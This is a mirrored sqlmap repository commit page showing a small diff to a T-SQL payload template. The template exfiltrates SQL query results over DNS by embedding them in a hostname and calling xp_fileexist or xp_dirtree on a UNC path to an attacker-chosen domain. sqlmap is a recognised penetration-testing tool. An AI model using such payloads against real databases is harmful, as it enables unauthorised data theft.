mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-02-16 19:40:37 +03:00
minor update
This commit is contained in:
parent
5f94987b0f
commit
46cfa64d81
|
@ -1,3 +1,4 @@
|
|||
DECLARE @host varchar(1024);
|
||||
SELECT @host = '%PREFIX%.' + (%QUERY%) + '.%SUFFIX%' + '.%DOMAIN%';
|
||||
EXEC('xp_fileexist "\\' + @host + '\c$boot.ini"');
|
||||
# or EXEC('xp_dirtree "\\' + @host + '."');
|
||||
|
|
Loading…
Reference in New Issue
Block a user